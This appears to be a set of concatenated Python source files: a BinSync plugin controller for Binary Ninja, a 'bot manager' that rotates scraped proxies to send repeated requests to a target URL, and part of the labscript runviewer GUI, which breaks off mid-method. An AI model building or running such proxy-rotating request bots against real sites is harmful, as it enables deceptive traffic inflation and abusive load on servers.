return True
def state_ctx(self, user=None, version=None, locked=False):
return self.client.state_ctx(user=user, version=version, locked=locked)
def status(self):
if self.check_client():
if self.client.has_remote:
return SyncControlStatus.CONNECTED
return SyncControlStatus.CONNECTED_NO_REMOTE
return SyncControlStatus.DISCONNECTED
def status_string(self):
stat = self.status()
if stat == SyncControlStatus.CONNECTED:
return f"Connected to a sync repo: {self.client.master_user}"
elif stat == SyncControlStatus.CONNECTED_NO_REMOTE:
return f"Connected to a sync repo (no remote): {self.client.master_user}"
else:
return "Not connected to a sync repo"
@init_checker
def users(self):
return self.client.users()
#
# DataBase Fillers
#
# TODO: support structs in Binja
#@init_checker
#@make_ro_state
#def fill_structs(self, user=None, state=None):
# """
# Grab all the structs from a specified user, then fill them locally
#
# @param user:
# @param state:
# @return:
# """
# # sanity check, the desired user has some structs to sync
# pulled_structs: List[Struct] = self.pull_structs(user=user, state=state)
# if len(pulled_structs) <= 0:
# print(f"[BinSync]: User {user} has no structs to sync!")
# return 0
#
# # convert each binsync struct into an ida struct and set it in the GUI
# for struct in pulled_structs:
# compat.set_ida_struct(struct, self)
#
# # set the type of each member in the structs
# all_typed_success = True
# for struct in pulled_structs:
# all_typed_success &= compat.set_ida_struct_member_types(struct, self)
#
# return all_typed_success
#
# Pullers
#
@init_checker
def sync_all(self, user=None, state=None):
# copy the actual state from the other user
self.client.sync_states(user=user)
new_state = self.client.get_state(user=self.client.master_user)
func_addrs = new_state.functions.keys()
print("[BinSync]: Target Addrs for sync:", [hex(x) for x in func_addrs])
# set the new stuff in the UI
for func_addr in func_addrs:
self.fill_function(func_addr, user=self.client.master_user)
def set_curr_bv(self, bv):
self.curr_bv = bv
def mark_as_current_function(self, bv, bn_func):
self.curr_bv = bv
self.curr_func = bn_func
def current_function(self, message_box=False):
all_contexts = UIContext.allContexts()
if not all_contexts:
if message_box:
show_message_box(
"UI contexts not found",
"No UI context is available. Please open a binary first.",
MessageBoxButtonSet.OKButtonSet,
MessageBoxIcon.ErrorIcon,
)
return None
ctx = all_contexts[0]
handler = ctx.contentActionHandler()
if handler is None:
if message_box:
show_message_box(
"Action handler not found",
"No action handler is available. Please open a binary first.",
MessageBoxButtonSet.OKButtonSet,
MessageBoxIcon.ErrorIcon,
)
return None
actionContext = handler.actionContext()
func = actionContext.function
if func is None:
if message_box:
show_message_box(
"No function is in selection",
"Please navigate to a function in the disassembly view.",
MessageBoxButtonSet.OKButtonSet,
MessageBoxIcon.ErrorIcon,
)
return None
return func
@init_checker
@make_ro_state
def fill_function(self, bn_func: binaryninja.function.Function, user=None, state=None) -> None:
"""
Grab all relevant information from the specified user and fill the @bn_func.
"""
_func = self.pull_function(bn_func, user=user, state=state)
if _func is None:
return
# name
bn_func.name = _func.name
# comments
for _, ins_addr in bn_func.instructions:
_comment = self.pull_comment(bn_func.start, ins_addr, user=user, state=state)
if _comment is not None:
bn_func.set_comment_at(ins_addr, _comment.comment)
# stack variables
existing_stack_vars: Dict[int, Any] = dict((v.storage, v) for v in bn_func.stack_layout
if v.source_type == VariableSourceType.StackVariableSourceType)
for offset, stack_var in self.pull_stack_variables(bn_func, user=user, state=state).items():
bn_offset = stack_var.get_offset(StackOffsetType.BINJA)
# skip if this variable already exists
type_, _ = bn_func.view.parse_type_string(stack_var.type)
if bn_offset in existing_stack_vars \
and existing_stack_vars[bn_offset].name == stack_var.name \
and existing_stack_vars[bn_offset].type == type_:
continue
existing_stack_vars[bn_offset].name = stack_var.name
last_type = existing_stack_vars[bn_offset].type
#print(f"LAST TYPE: {last_type}")
try:
bn_func.create_user_stack_var(bn_offset, last_type, stack_var.name)
bn_func.create_auto_stack_var(bn_offset, last_type, stack_var.name)
except Exception as e:
print(f"[BinSync]: Could not sync stack variable {bn_offset}: {e}")
bn_func.reanalyze()
print(f"[Binsync]: New data synced for \'{user}\' on function {hex(bn_func.start)}.")
#
# Pushers
#
@init_checker
@make_state
def push_function(self, bn_func: binaryninja.function.Function, user=None, state=None):
# Push function
func = binsync.data.Function(
int(bn_func.start)
) # force conversion from long to int
func.name = bn_func.name
state.set_function(func)
@init_checker
@make_state
def push_patch(self, patch, user=None, state=None):
state.set_patch(patch.offset, patch)
@init_checker
@make_state
def push_stack_variable(self, bn_func: binaryninja.Function, stack_var: binaryninja.function.Variable,
user=None, state=None):
if stack_var.source_type != VariableSourceType.StackVariableSourceType:
raise TypeError("Unexpected source type %s of the variable %r." % (stack_var.source_type, stack_var))
type_str = stack_var.type.get_string_before_name()
size = stack_var.type.width
v = StackVariable(stack_var.storage,
StackOffsetType.BINJA,
stack_var.name,
type_str,
size,
bn_func.start)
state.set_stack_variable(v, stack_var.storage, bn_func.start)
@init_checker
@make_state
def push_stack_variables(self, bn_func, user=None, state=None):
for stack_var in bn_func.stack_layout:
# ignore all unnamed variables
# TODO: Do not ignore re-typed but unnamed variables
if re.match(r"var_\d+[_\d+]{0,1}", stack_var.name) \
or stack_var.name in {
'__saved_rbp', '__return_addr',
}:
continue
if not stack_var.source_type == VariableSourceType.StackVariableSourceType:
continue
self.push_stack_variable(bn_func, stack_var, state=state, user=user)
@init_checker
@make_state
def remove_all_comments(self, bn_func: binaryninja.function.Function, user=None, state=None) -> None:
for _, ins_addr in bn_func.instructions:
if ins_addr in state.comments:
state.remove_comment(ins_addr)
@init_checker
@make_state
def push_comments(self, func, comments: Dict[int,str], user=None, state=None) -> None:
# Push comments
for addr, comment in comments.items():
cmt = binsync.data.Comment(func.start, int(addr), comment, decompiled=True)
state.set_comment(cmt)
#
# Pullers
#
@init_checker
@make_ro_state
def pull_stack_variables(self, bn_func, user=None, state=None) -> Dict[int,StackVariable]:
try:
return {k: v for k, v in state.get_stack_variables(bn_func.start)}
except KeyError:
return { }
@init_checker
@make_ro_state
def pull_stack_variable(self, bn_func, offset: int, user=None, state=None) -> StackVariable:
return state.get_stack_variable(bn_func.start, offset)
@init_checker
@make_ro_state
def pull_function(self, bn_func, user=None, state=None) -> Optional[Function]:
"""
Pull a function downwards.
:param bv:
:param bn_func:
:param user:
:return:
"""
# pull function
try:
func = state.get_function(int(bn_func.start))
return func
except KeyError:
return None
@init_checker
@make_ro_state
def pull_comment(self, func_addr, addr, user=None, state=None) -> Optional[str]:
"""
Pull comments downwards.
:param bv:
:param start_addr:
:param end_addr:
:param user:
:return:
"""
try:
return state.get_comment(func_addr, addr)
except KeyError:
return None
@init_checker
@make_ro_state
def pull_comments(self, func_addr, user=None, state=None) -> Optional[Iterable[str]]:
"""
Pull comments downwards.
:param bv:
:param start_addr:
:param end_addr:
:param user:
:return:
"""
return state.get_comments(func_addr)
@staticmethod
def _parse_and_display_connection_warnings(warnings):
warning_text = ""
for warning in warnings:
if warning == ConnectionWarnings.HASH_MISMATCH:
warning_text += "Warning: the hash stored for this BinSync project does not match"
warning_text += " the hash of the binary you are attempting to analyze. It's possible"
warning_text += " you are working on a different binary.\n"
if len(warning_text) > 0:
QMessageBox.warning(
None,
"BinSync: Connection Warnings",
warning_text,
QMessageBox.Ok,
)
@staticmethod
def friendly_datetime(time_before):
# convert
if isinstance(time_before, int):
dt = datetime.datetime.fromtimestamp(time_before)
elif isinstance(time_before, datetime.datetime):
dt = time_before
else:
return ""
now = datetime.datetime.now()
if dt <= now:
diff = now - dt
ago = True
else:
diff = dt - now
ago = False
diff_days = diff.days
diff_sec = diff.seconds
if diff_days >= 1:
s = "%d days" % diff_days
elif diff_sec >= 60 * 60:
s = "%d hours" % int(diff_sec / 60 / 60)
elif diff_sec >= 60:
s = "%d minutes" % int(diff_sec / 60)
else:
s = "%d seconds" % diff_sec
s += " ago" if ago else " in the future"
return s
|
manager.py
|
# Date: 05/10/2018
# Author: Pure-L0G1C
# Description: Manages bots
from .bot import Bot
from .list import List
from .spyder import Spyder
from threading import Thread
from .const import MAX_REQUESTS
class Manager(object):
def __init__(self, threads, url):
self.threads = threads
self.spyder = Spyder()
self.isAlive = True
self.bots = List()
self.url = url
def bot_size_manager(self):
while self.isAlive:
while all([self.isAlive, self.bots.lsize < self.threads]):
try:
if self.spyder.proxies.qsize:
proxy = self.spyder.proxies.get()
proxy_addr = { 'https': 'https://{}:{}'.format(proxy['ip'], proxy['port']) }
browser = self.spyder.browser(proxy_addr)
bot = Bot(browser, self.url)
self.bots.add(bot)
except KeyboardInterrupt:
self.isAlive = False
def bot_requests_manager(self):
while self.isAlive:
while all([self.isAlive, self.bots.lsize]):
try:
expired = [] # expired bots
for _ in range(self.bots.lsize):
bot = self.bots.get_item(_)
if bot.requests >= MAX_REQUESTS:
expired.append(_)
for _ in expired:
self.bots.remove(_)
except KeyboardInterrupt:
self.isAlive = False
def start(self):
bot_size = Thread(target=self.bot_size_manager)
spyder = Thread(target=self.spyder.proxy_manager)
bot_requests = Thread(target=self.bot_requests_manager)
bot_requests.daemon = True
bot_size.daemon = True
spyder.daemon = True
spyder.start()
bot_size.start()
bot_requests.start()
def stop(self):
self.isAlive = False
self.spyder.isAlive = False
|
__main__.py
|
#####################################################################
# #
# /main.pyw #
# #
# Copyright 2014, Monash University #
# #
# This file is part of the program runviewer, in the labscript #
# suite (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
from labscript_utils import PY2
import os
import sys
import time
import threading
import logging
import ctypes
import socket
if PY2:
str = unicode
from Queue import Queue
else:
from queue import Queue
import ast
import pprint
import signal
# Quit on ctrl-c
signal.signal(signal.SIGINT, signal.SIG_DFL)
import labscript_utils.excepthook
# Set working directory to runviewer folder, resolving symlinks
runviewer_dir = os.path.dirname(os.path.realpath(__file__))
os.chdir(runviewer_dir)
try:
from labscript_utils import check_version
except ImportError:
raise ImportError('Require labscript_utils > 2.1.0')
check_version('labscript_utils', '2.6.1', '3')
check_version('qtutils', '2.0.0', '3.0.0')
check_version('zprocess', '1.1.2', '3')
from labscript_utils.setup_logging import setup_logging
logger = setup_logging('runviewer')
labscript_utils.excepthook.set_logger(logger)
from zprocess import zmq_get, ZMQServer
import zprocess.locking
import labscript_utils.h5_lock
import h5py
zprocess.locking.set_client_process_name('runviewer')
# This must be bumped until after the h5_lock import
# This is because the check imports pyqtgraph, which imports h5py
# h5py must be imported after h5_lock, thus we do the check here
check_version('pyqtgraph', '0.9.10', '1')
from qtutils.qt.QtCore import *
from qtutils.qt.QtGui import *
from qtutils.qt.QtWidgets import *
from qtutils.qt.QtCore import pyqtSignal as Signal
import numpy
from scipy import interpolate
# must be imported after PySide/PyQt4
import pyqtgraph as pg
pg.setConfigOption('background', 'w')
pg.setConfigOption('foreground', 'k')
from qtutils import *
import qtutils.icons
from labscript_utils.connections import ConnectionTable
import labscript_devices
from labscript_utils.labconfig import LabConfig, config_prefix
from runviewer.resample import resample as _resample
def set_win_appusermodel(window_id):
from labscript_utils.winshell import set_appusermodel, appids, app_descriptions
icon_path = os.path.abspath('runviewer.ico')
executable = sys.executable.lower()
if not executable.endswith('w.exe'):
executable = executable.replace('.exe', 'w.exe')
relaunch_command = executable + ' ' + os.path.abspath(__file__.replace('.pyc', '.py'))
relaunch_display_name = app_descriptions['runviewer']
set_appusermodel(window_id, appids['runviewer'], icon_path, relaunch_command, relaunch_display_name)
SHOT_MODEL__COLOUR_INDEX = 0
SHOT_MODEL__SHUTTER_INDEX = 1
SHOT_MODEL__CHECKBOX_INDEX = 2
SHOT_MODEL__PATH_INDEX = 1
CHANNEL_MODEL__CHECKBOX_INDEX = 0
CHANNEL_MODEL__CHANNEL_INDEX = 0
def format_time(input_sec):
# inout is the time in sec
if input_sec >= 1:
return "{:.3g}s".format(input_sec)
elif input_sec >= 1e-3:
return "{:.3g}ms".format(input_sec * 1e3)
elif input_sec >= 1e-6:
return "{:.3g}us".format(input_sec * 1e6)
elif input_sec >= 1e-9:
return "{:.3g}ns".format(input_sec * 1e9)
elif input_sec >= 1e-12:
return "{:.3g}ps".format(input_sec * 1e12)
elif input_sec >= 1e-15:
return "{:.3g}fs".format(input_sec * 1e15)
elif input_sec >= 1e-18:
return "{:.3g}as".format(input_sec * 1e18)
else:
return str(input_sec) + "s"
def int_to_enum(enum_list, value):
"""stupid hack to work around the fact that PySide screws with the type of a variable when it goes into a model. Enums are converted to ints, which then
can't be interpreted by QColor correctly (for example)
unfortunately Qt doesn't provide a python list structure of enums, so you have to build the list yourself.
"""
for item in enum_list:
if item == value:
return item
return value
class ScaleHandler():
def __init__(self, input_times, stop_time):
# input_times is a list (may be unsorted) of times which should be scaled evenly with target_length
# an input list of [1,2,4,6] and target_length of 1.0 will result in:
# get_scaled_time(1) -> 1
# get_scaled_time(1.5) -> 1.5
# get_scaled_time(3) -> 2.5
# get_scaled_time(4) -> 3
# get_scaled_time(5) -> 3.5 ...
self.org_stop_time = float(stop_time)
if 0 not in input_times:
input_times.append(0)
if self.org_stop_time not in input_times:
input_times.append(self.org_stop_time)
if not all((x >= 0) and (x <= self.org_stop_time) for x in input_times):
raise Exception('shot contains at least one marker before t=0 and/or after the stop time. Non-linear time currently does not support this.')
unscaled_times = sorted(input_times)
target_length = self.org_stop_time / float(len(unscaled_times)-1)
scaled_times = [target_length*i for i in range(len(input_times))]
# append values for linear scaling before t=0 and after stop time
unscaled_times = [-1e-9] + unscaled_times + [self.org_stop_time + 1e-9]
scaled_times = [-1e-9] + scaled_times + [self.org_stop_time + 1e-9]
self.get_scaled_time = interpolate.interp1d(unscaled_times, scaled_times, assume_sorted=False, bounds_error=False, fill_value='extrapolate')
self.get_unscaled_time = interpolate.interp1d(scaled_times, unscaled_times, assume_sorted=False, bounds_error=False, fill_value='extrapolate')
self.scaled_stop_time = self.get_scaled_time(self.org_stop_time)
class ColourDelegate(QItemDelegate):
def __init__(self, view, *args, **kwargs):
QItemDelegate.__init__(self, *args, **kwargs)
self._view = view
self._colours = [Qt.black, Qt.red, Qt.green, Qt.blue, Qt.cyan, Qt.magenta, Qt.yellow, Qt.gray, Qt.darkRed, Qt.darkGreen, Qt.darkBlue, Qt.darkCyan, Qt.darkMagenta, Qt.darkYellow, Qt.darkGray, Qt.lightGray]
self._current_colour_index = 0
def get_next_colour(self):
colour = self._colours[self._current_colour_index]
self._current_colour_index += 1
if self._current_colour_index >= len(self._colours):
self._current_colour_index = 0
return colour
def createEditor(self, parent, option, index):
editor = QComboBox(parent)
#colours = QColor.colorNames()
for colour in self._colours:
pixmap = QPixmap(20, 20)
pixmap.fill(colour)
editor.addItem(QIcon(pixmap), '', colour)
editor.activated.connect(lambda index, editor=editor: self._view.commitData(editor))
editor.activated.connect(lambda index, editor=editor: self._view.closeEditor(editor, QAbstractItemDelegate.NoHint))
QTimer.singleShot(10, editor.showPopup)
return editor
def setEditorData(self, editor, index):
value = index.model().data(index, Qt.UserRole)
for i in range(editor.count()):
if editor.itemData(i) == value():
editor.setCurrentIndex(i)
break
def setModelData(self, editor, model, index):
icon = editor.itemIcon(editor.currentIndex())
colour = editor.itemData(editor.currentIndex())
# Note, all data being written to the model must be read out of the editor PRIOR to calling model.setData()
# This is because a call to model.setData() triggers setEditorData(), which messes up subsequent
# calls to the editor to determine the currently selected item/data
model.setData(index, icon, Qt.DecorationRole)
model.setData(index, lambda clist=self._colours, colour=colour: int_to_enum(clist, colour), Qt.UserRole)
def updateEditorGeometry(self, editor, option, index):
editor.setGeometry(option.rect)
class RunviewerMainWindow(QMainWindow):
# A signal for when the window manager has created a new window for this widget:
newWindow = Signal(int)
def event(self, event):
result = QMainWindow.event(self, event)
if event.type() == QEvent.WinIdChange:
self.newWindow.emit(self.effectiveWinId())
return result
class RunViewer(object):
def __init__(self, exp_config):
self.ui = UiLoader().load(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'main.ui'), RunviewerMainWindow())
# setup shot treeview model
self.shot_model = QStandardItemModel()
self.shot_model.setHorizontalHeaderLabels(['colour', 'shutters', 'path'])
self.ui.shot_treeview.setModel(self.shot_model)
self.ui.shot_treeview.resizeColumnToContents(1)
self.shot_model.itemChanged.connect(self.on_shot_selection_changed)
self.shot_colour_delegate = ColourDelegate(self.ui.shot_treeview)
self.ui.shot_treeview.setItemDelegateForColumn(0, self.shot_colour_delegate)
# setup channel treeview model
self.channel_model = QStandardItemModel()
self.channel_model.setHorizontalHeaderLabels(['channel'])
self.ui.channel_treeview.setModel(self.channel_model)
self.channel_model.itemChanged.connect(self.update_plots)
# create a hidden plot widget that all plots can link their x-axis too
hidden_plot = pg.PlotWidget(name='runviewer - time axis link')
hidden_plot.setMinimumHeight(1)
hidden_plot.setMaximumHeight(1)
hidden_plot.setLabel('bottom', 'Time', units='s')
hidden_plot.setLabel('left', " ")
hidden_plot.showAxis('right', True)
hidden_plot_item = hidden_plot.plot([0, 1], [0, 0])
self._hidden_plot = (hidden_plot, hidden_plot_item)
self.ui.hidden_plot_layout.addWidget(hidden_plot)
time_axis_plot = pg.PlotWidget()
time_axis_plot.setMinimumHeight(120)
time_axis_plot.setMaximumHeight(120)
time_axis_plot.setLabel('bottom', 'Time', units='s')
time_axis_plot.showAxis('right', True)
time_axis_plot.setXLink('runviewer - time axis link')
time_axis_plot.setMouseEnabled(y=False)
time_axis_plot.getAxis('left').setTicks([]) # hide y ticks in the left & right side. only show time axis
time_axis_plot.getAxis('right').setTicks([])
time_axis_plot.setLabel('left', 'Slots')
time_axis_plot.scene().sigMouseMoved.connect(lambda pos: self.mouseMovedEvent(pos, time_axis_plot, "Slots"))
time_axis_plot_item = time_axis_plot.plot([0, 1], [0, 0], pen=(255, 255, 255))
self._time_axis_plot = (time_axis_plot, time_axis_plot_item)
self.all_markers = {}
self.all_marker_items = {}
markers_plot = pg.PlotWidget(name='runviewer - markers')
markers_plot.setMinimumHeight(120)
markers_plot.setMaximumHeight(120)
markers_plot.showAxis('top', False)
markers_plot.showAxis('bottom', False)
markers_plot.showAxis('left', True)
markers_plot.showAxis('right', True)
markers_plot.getAxis('left').setTicks([])
markers_plot.getAxis('right').setTicks([])
markers_plot.setLabel('left', 'Markers')
markers_plot.setXLink('runviewer - time axis link')
markers_plot.setMouseEnabled(y=False)
markers_plot.scene().sigMouseMoved.connect(lambda pos: self.mouseMovedEvent(pos, markers_plot, "Markers"))
markers_plot_item = markers_plot.plot([])
self._markers_plot = (markers_plot, markers_plot_item)
self.ui.verticalLayout_9.insertWidget(1,markers_plot)
self.ui.plot_layout.addWidget(time_axis_plot)
# add some icons
self.ui.add_shot.setIcon(QIcon(':/qtutils/fugue/plus'))
self.ui.remove_shots.setIcon(QIcon(':/qtutils/fugue/minus'))
self.ui.enable_selected_shots.setIcon(QIcon(':/qtutils/fugue/ui-check-box'))
self.ui.disable_selected_shots.setIcon(QIcon(':/qtutils/fugue/ui-check-box-uncheck'))
self.ui.group_channel.setIcon(QIcon(':/qtutils/fugue/layers-group'))
self.ui.delete_group.setIcon(QIcon(':/qtutils/fugue/layers-ungroup'))
self.ui.channel_move_to_top.setIcon(QIcon(':/qtutils/fugue/arrow-stop-090'))
self.ui.channel_move_up.setIcon(QIcon(':/qtutils/fugue/arrow-090'))
self.ui.channel_move_down.setIcon(QIcon(':/qtutils/fugue/arrow-270'))
self.ui.channel_move_to_bottom.setIcon(QIcon(':/qtutils/fugue/arrow-stop-270'))
self.ui.reset_x_axis.setIcon(QIcon(':/qtutils/fugue/clock-history'))
self.ui.reset_y_axis.setIcon(QIcon(':/qtutils/fugue/magnifier-history'))
self.ui.toggle_tooltip.setIcon(QIcon(':/qtutils/fugue/ui-tooltip-balloon'))
self.ui.non_linear_time.setIcon(QIcon(':/qtutils/fugue/ui-ruler'))
self.ui.actionOpen_Shot.setIcon(QIcon(':/qtutils/fugue/plus'))
self.ui.actionQuit.setIcon(QIcon(':/qtutils/fugue/cross-button'))
self.ui.actionLoad_channel_config.setIcon(QIcon(':/qtutils/fugue/folder-open'))
self.ui.actionSave_channel_config.setIcon(QIcon(':/qtutils/fugue/disk'))
# disable buttons that are not yet implemented to help avoid confusion!
self.ui.group_channel.setEnabled(False)
self.ui.delete_group.setEnabled(False)
# connect signals
self.ui.reset_x_axis.clicked.connect(self.on_x_axis_reset)
self.ui.reset_y_axis.clicked.connect(self.on_y_axes_reset)
self.ui.channel_move_up.clicked.connect(self._move_up)
self.ui.channel_move_down.clicked.connect(self._move_down)
self.ui.channel_move_to_top.clicked.connect(self._move_top)
self.ui.channel_move_to_bottom.clicked.connect(self._move_bottom)
self.ui.enable_selected_shots.clicked.connect(self._enable_selected_shots)
self.ui.disable_selected_shots.clicked.connect(self._disable_selected_shots)
self.ui.add_shot.clicked.connect(self.on_add_shot)
self.ui.markers_comboBox.currentIndexChanged.connect(self._update_markers)
self.ui.non_linear_time.toggled.connect(self._toggle_non_linear_time)
self.ui.remove_shots.clicked.connect(self.on_remove_shots)
self.ui.actionOpen_Shot.triggered.connect(self.on_add_shot)
self.ui.actionQuit.triggered.connect(self.ui.close)
self.ui.actionLoad_channel_config.triggered.connect(self.on_load_channel_config)
self.ui.actionSave_channel_config.triggered.connect(self.on_save_channel_config)
if os.name == 'nt':
self.ui.newWindow.connect(set_win_appusermodel)
self.ui.show()
# internal variables
#self._channels_list = {}
self.plot_widgets = {}
self.plot_items = {}
self.shutter_lines = {}
try:
self.default_config_path = os.path.join(exp_config.get('DEFAULT', 'app_saved_configs'), 'runviewer')
except LabConfig.NoOptionError:
exp_config.set('DEFAULT', 'app_saved_configs', os.path.join('%(labscript_suite)s', 'userlib', 'app_saved_configs', '%(experiment_name)s'))
self.default_config_path = os.path.join(exp_config.get('DEFAULT', 'app_saved_configs'), 'runviewer')
if not os.path.exists(self.default_config_path):
os.makedirs(self.default_config_path)
self.last_opened_shots_folder = exp_config.get('paths', 'experiment_shot_storage')
# start resample thread
self._resample = False
self._thread = threading.Thread(target=self._resample_thread)
self._thread.daemon = True
self._thread.start()
# start shots_to_process_queue monitoring thread
self._shots_to_process_thread = threading.Thread(target=self._process_shots)
self._shots_to_process_thread.daemon = True
self._shots_to_process_thread.start()
self.scale_time = False
self.scalehandler = None
def _update_markers(self, index):
for line, plot in self.all_marker_items.items():
plot.removeItem(line)
self.all_marker_items = {}
marker_index = self.ui.markers_comboBox.currentIndex()
shot = self.ui.markers_comboBox.itemData(marker_index)
self.all_markers = shot.markers if index > 0 else {}
self._update_non_linear_time(changed_shot=True)
times = sorted(list(self.all_markers.keys()))
for i, (t, m) in enumerate(sorted(self.all_markers.items())):
if i < len(times)-1:
delta_t = times[i+1] - t
else:
delta_t = shot.stop_time - t
if self.scale_time:
t = self.scalehandler.get_scaled_time(t)
color = m['color']
color = QColor(color[0], color[1], color[2])
label = m['label'].decode() if isinstance( m['label'], bytes) else str(m['label'])
line = self._markers_plot[0].addLine(x=t, pen=pg.mkPen(color=color, width=1.5, style=Qt.DashLine), label=label, labelOpts= {"color": color, "fill": QColor(255, 255, 255, 255), "rotateAxis":(1, 0), "anchors": [(0.5, 0),(0.5, 0)]} )
self.all_marker_items[line] = self._markers_plot[0]
line = self._time_axis_plot[0].addLine(x=t, pen=pg.mkPen(color=color, width=1.5, style=Qt.DashLine), label=format_time(delta_t), labelOpts= {"color": color, "fill": QColor(255, 255, 255, 255), "rotateAxis":(1, 0), "anchors": [(0.5, 0),(0.5, 0)]} )
self.all_marker_items[line] = self._time_axis_plot[0]
self.update_plots()
def mouseMovedEvent(self, position, ui, name):
if self.ui.toggle_tooltip.isChecked():
v = ui.scene().views()[0]
viewP = v.mapFromScene(position)
glob_pos = ui.mapToGlobal(viewP) # convert to Screen x
glob_zero = ui.mapToGlobal(QPoint(0, 0))
self._global_start_x = glob_zero.x()
self._global_start_y = glob_zero.y()
self._global_width = ui.width()
self._global_height = ui.height()
coord_pos = ui.plotItem.vb.mapSceneToView(position)
if len(self.get_selected_shots_and_colours()) > 0:
if self.scale_time and self.scalehandler is not None:
unscaled_t = float(self.scalehandler.get_unscaled_time(coord_pos.x()))
else:
unscaled_t = float(coord_pos.x())
if unscaled_t is not None:
pos = QPoint(glob_pos.x(), glob_pos.y())
plot_data = ui.plotItem.listDataItems()[0].getData()
if plot_data[0] is not None and unscaled_t is not None:
nearest_index = numpy.abs(plot_data[0] - unscaled_t).argmin() - 1
y_val = "{:.2f}".format(plot_data[1][nearest_index])
else:
y_val = '-'
text = "Plot: {} \nTime: {:.9f}s\nValue: {}".format(name, unscaled_t, y_val)
QToolTip.showText(pos, text)
def _toggle_non_linear_time(self, state):
self.scale_time = state
self._update_non_linear_time()
def _update_non_linear_time(self, changed_shot=False):
old_scalerhandler = self.scalehandler
marker_index = self.ui.markers_comboBox.currentIndex()
shot = self.ui.markers_comboBox.itemData(marker_index)
if shot is not None and self.scale_time:
self.scalehandler = shot.scalehandler
else:
self.scalehandler = None
# combine markers and shutter lines
markers = list(self.all_marker_items.keys())
for channel in self.shutter_lines:
for shot in self.shutter_lines[channel]:
for line in self.shutter_lines[channel][shot][0]:
markers.append(line)
for line in self.shutter_lines[channel][shot][1]:
markers.append(line)
# Move all Markes/Shutter Lines to new position
for marker in markers:
pos = marker.pos()
if old_scalerhandler is None:
unscaled_x = pos.x()
else:
unscaled_x = old_scalerhandler.get_unscaled_time(pos.x())
if self.scale_time and self.scalehandler is not None:
new_x = self.scalehandler.get_scaled_time(unscaled_x)
else:
new_x = unscaled_x
pos.setX(new_x)
marker.setPos(pos)
if shot is not None and self.scale_time:
self._time_axis_plot[0].getAxis("bottom").setTicks([[[0, 0], [shot.stop_time, shot.stop_time]]])
for plot in self.plot_widgets.values():
plot.getAxis("bottom").setTicks([[[0, 0], [shot.stop_time, shot.stop_time]]])
else:
self._time_axis_plot[0].getAxis("bottom").setTicks(None)
for plot in self.plot_widgets.values():
plot.getAxis("bottom").setTicks(None)
for plot in self.plot_widgets.values():
for item in plot.getPlotItem().items:
if isinstance(item, pg.PlotDataItem):
if old_scalerhandler is not None:
unscaled_t = old_scalerhandler.get_unscaled_time(item.xData)
else:
unscaled_t = item.xData
if self.scalehandler is not None:
item.setData(self.scalehandler.get_scaled_time(unscaled_t), item.yData)
else:
item.setData(unscaled_t, item.yData)
self._resample = True
def _process_shots(self):
while True:
filepath = shots_to_process_queue.get()
inmain_later(self.load_shot, filepath)
def on_load_channel_config(self):
config_file = QFileDialog.getOpenFileName(self.ui, "Select file to load", self.default_config_path, "Config files (*.ini)")
if isinstance(config_file, tuple):
config_file, _ = config_file
if config_file:
runviewer_config = LabConfig(config_file)
try:
channels = ast.literal_eval(runviewer_config.get('runviewer_state', 'Channels'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
channels = {}
for row, (channel, checked) in enumerate(channels):
check_items = self.channel_model.findItems(channel)
if len(check_items) == 0:
items = []
check_item = QStandardItem(channel)
check_item.setEditable(False)
check_item.setCheckable(True)
items.append(check_item)
check_item.setCheckState(Qt.Checked if checked else Qt.Unchecked)
check_item.setEnabled(False)
self.channel_model.insertRow(row, items)
else:
check_item = check_items[0]
check_item.setCheckState(Qt.Checked if checked else Qt.Unchecked)
self.channel_model.takeRow(check_item.row())
self.channel_model.insertRow(row, check_item)
def on_save_channel_config(self):
save_file = QFileDialog.getSaveFileName(self.ui, 'Select file to save current channel configuration', self.default_config_path, "config files (*.ini)")
if type(save_file) is tuple:
save_file, _ = save_file
if save_file:
runviewer_config = LabConfig(save_file)
channels = []
for row in range(self.channel_model.rowCount()):
item = self.channel_model.item(row)
channels.append((item.text(), item.checkState() == Qt.Checked))
runviewer_config.set('runviewer_state', 'Channels', pprint.pformat(channels))
def on_toggle_shutter(self, checked, current_shot):
for channel in self.shutter_lines:
for shot in self.shutter_lines[channel]:
if shot == current_shot:
for line in self.shutter_lines[channel][shot][0]:
if checked:
line.show()
else:
line.hide()
for line in self.shutter_lines[channel][shot][1]:
if checked:
line.show()
else:
line.hide()
def on_add_shot(self):
selected_files = QFileDialog.getOpenFileNames(self.ui, "Select file to load", self.last_opened_shots_folder, "HDF5 files (*.h5 *.hdf5)")
popup_warning = False
if isinstance(selected_files, tuple):
selected_files, _ = selected_files
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
selected_files = [os.path.abspath(str(shot_file)) for shot_file in selected_files]
if len(selected_files) > 0:
self.last_opened_shots_folder = os.path.dirname(selected_files[0])
for file in selected_files:
try:
filepath = str(file)
# Qt has this weird behaviour where if you type in the name of a file that exists
# but does not have the extension you have limited the dialog to, the OK button is greyed out
# but you can hit enter and the file will be selected.
# So we must check the extension of each file here!
if filepath.endswith('.h5') or filepath.endswith('.hdf5'):
self.load_shot(filepath)
else:
popup_warning = True
except:
popup_warning = True
raise
if popup_warning:
message = QMessageBox()
message.setText("Warning: Some shots were not loaded because they were not valid hdf5 files")
message.setIcon(QMessageBox.Warning)
message.setWindowTitle("Runviewer")
message.setStandardButtons(QMessageBox.Ok)
message.exec_()
def on_remove_shots(self):
# Get the selection model from the treeview
selection_model = self.ui.shot_treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in selection_model.selectedRows()]
# sort in descending order to prevent index changes of rows to be deleted
selected_row_list.sort(reverse=True)
reply = QMessageBox.question(self.ui, 'Runviewer', 'Remove {} shots?'.format(len(selected_row_list)),
QMessageBox.Yes | QMessageBox.No)
if reply == QMessageBox.No:
return
for row in selected_row_list:
item = self.shot_model.item(row, SHOT_MODEL__CHECKBOX_INDEX)
colour_item = self.shot_model.item(row, SHOT_MODEL__COLOUR_INDEX)
shutter_item = self.shot_model.item(row, SHOT_MODEL__SHUTTER_INDEX)
shot = item.data()
# unselect shot
item.setCheckState(Qt.Unchecked)
shutter_item.setCheckState(Qt.Unchecked)
# remove row
self.shot_model.removeRow(row)
del shot
def on_shot_selection_changed(self, item):
if self.shot_model.indexFromItem(item).column() == SHOT_MODEL__CHECKBOX_INDEX:
# add or remove a colour for this shot
